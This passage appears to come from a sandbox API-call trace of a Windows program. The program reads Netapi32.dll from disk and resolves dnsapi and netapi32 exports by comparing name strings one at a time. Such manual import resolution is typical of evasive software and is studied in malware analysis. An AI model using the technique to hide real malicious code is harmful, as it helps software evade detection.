(lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0139.577] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0139.578] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0139.579] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0139.579] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0139.579] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0139.579] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0139.579] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.579] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0139.579] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0139.579] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0139.579] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0139.580] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0139.587] GetProcessHeap () returned 0x530000 [0139.587] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a8d010 | out: hHeap=0x530000) returned 1 [0139.588] GetProcessHeap () returned 0x530000 [0139.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x5491e0 [0139.588] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0139.591] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0139.591] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0139.592] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0139.592] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0139.592] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0139.592] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0139.592] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0139.592] GetProcessHeap () returned 0x530000 [0139.592] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x13b00) returned 0x2d55030 [0139.592] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0139.592] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0139.593] CloseHandle (hObject=0x17c) returned 1 [0139.593] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0139.593] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0139.593] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0139.593] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0139.593] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0139.594] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0139.595] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0139.596] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0139.596] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0139.597] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0139.598] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0139.599] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0139.599] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0139.600] lstrcmpA 